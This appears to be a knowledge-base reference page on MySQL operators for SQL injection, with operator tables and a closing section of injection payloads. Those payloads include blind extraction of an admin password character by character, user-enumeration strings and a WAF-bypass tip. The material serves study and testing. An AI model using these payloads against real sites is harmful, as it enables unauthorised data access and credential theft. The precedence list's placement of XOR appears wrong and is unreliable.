Operators

MySQL operators useful for SQL injection techniques

Reference Last updated: March 14, 2025
operatorscomparisonlogicalreference

Operators

Understanding MySQL operators is essential for crafting effective SQL injection payloads. This reference covers the most useful operators for SQL injection techniques.

Comparison Operators

OperatorDescriptionExample
=EqualSELECT * FROM users WHERE id = 1
<=>NULL-safe equalSELECT * FROM users WHERE name <=> NULL
<> or !=Not equalSELECT * FROM users WHERE id <> 1
>Greater thanSELECT * FROM users WHERE id > 1
>=Greater than or equalSELECT * FROM users WHERE id >= 1
<Less thanSELECT * FROM users WHERE id < 10
<=Less than or equalSELECT * FROM users WHERE id <= 10
BETWEENBetween rangeSELECT * FROM users WHERE id BETWEEN 1 AND 10
IS NULLNull checkSELECT * FROM users WHERE email IS NULL
IS NOT NULLNot null checkSELECT * FROM users WHERE email IS NOT NULL
LIKEPattern matchingSELECT * FROM users WHERE name LIKE 'a%'
REGEXPRegular expressionSELECT * FROM users WHERE name REGEXP '^a'
INIn setSELECT * FROM users WHERE id IN (1,2,3)

Logical Operators

OperatorDescriptionExample
AND or &&Logical ANDSELECT * FROM users WHERE active=1 AND admin=1
OR or ||Logical ORSELECT * FROM users WHERE id=1 OR username='admin'
NOT or !Logical NOTSELECT * FROM users WHERE NOT id=1
XORLogical XORSELECT * FROM users WHERE id=1 XOR admin=1

Mathematical Operators

OperatorDescriptionExample
+AdditionSELECT id+1 FROM users
-SubtractionSELECT id-1 FROM users
*MultiplicationSELECT id*2 FROM users
/DivisionSELECT id/2 FROM users
DIVInteger divisionSELECT id DIV 2 FROM users
% or MODModuloSELECT id % 2 FROM users

Bitwise Operators

OperatorDescriptionExample
&Bitwise ANDSELECT 5 & 1 (returns 1)
|Bitwise ORSELECT 5 | 1 (returns 5)
^Bitwise XORSELECT 5 ^ 1 (returns 4)
<<Left shiftSELECT 1 << 2 (returns 4)
>>Right shiftSELECT 4 >> 2 (returns 1)
~Bitwise NOTSELECT ~1 (returns -2)

Assignment Operators

OperatorDescriptionExample
:=Value assignmentSET @var := 1

String Operators

OperatorDescriptionExample
CONCAT()String concatenationSELECT CONCAT(first_name, ' ', last_name) FROM users
CONCAT_WS()Concatenation with separatorSELECT CONCAT_WS('-', 'a', 'b', 'c') (returns ‘a-b-c’)

Usage in SQL Injection

Boolean-Based Blind Injection

-- Testing if admin exists
' OR EXISTS(SELECT * FROM users WHERE username='admin') -- -

-- Character by character extraction
' OR ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))=97 -- -

Operator Precedence Exploitation

Operators follow a precedence order that can be exploited:

-- AND has higher precedence than OR
1=0 OR 1=1 AND 2=2 -- True because (1=1 AND 2=2) evaluates first

-- Using parentheses to control evaluation order
1=0 OR (1=1 AND 2=2) -- True
(1=0 OR 1=1) AND 2=2 -- True

Alternative Operator Forms

Using alternative forms can help bypass WAF filters:

-- Standard form
SELECT * FROM users WHERE id=1 OR username='admin'

-- Alternative form
SELECT * FROM users WHERE id=1 || username='admin'

Practical Examples in Injections

-- Using NOT to invert conditions
' OR NOT 2=3 -- -

-- Using IN for multiple values
' OR username IN ('admin','root') -- -

-- Using LIKE for pattern matching
' OR username LIKE 'adm%' -- -

-- Using BETWEEN for range checking
' OR id BETWEEN 1 AND 5 -- -

Truth Table for Logical Operators

Expr1Expr2ANDORXOR
TRUETRUETRUETRUEFALSE
TRUEFALSEFALSETRUETRUE
FALSETRUEFALSETRUETRUE
FALSEFALSEFALSEFALSEFALSE
NULLTRUENULLTRUENULL
TRUENULLNULLTRUENULL
FALSENULLFALSENULLNULL
NULLFALSEFALSENULLNULL
NULLNULLNULLNULLNULL

Operator Precedence in MySQL

From highest to lowest:

  1. !, ~ (unary operators)
  2. ^ (bitwise XOR)
  3. *, /, DIV, %, MOD
  4. -, + (binary operators)
  5. <<, >>
  6. &
  7. |
  8. =, <=>, >=, >, <=, <, <>, !=, IS, LIKE, REGEXP
  9. BETWEEN, CASE, WHEN, THEN, ELSE
  10. NOT
  11. AND, &&
  12. OR, ||
  13. XOR

Understanding operator precedence is crucial for complex injections.

Back to Knowledge Base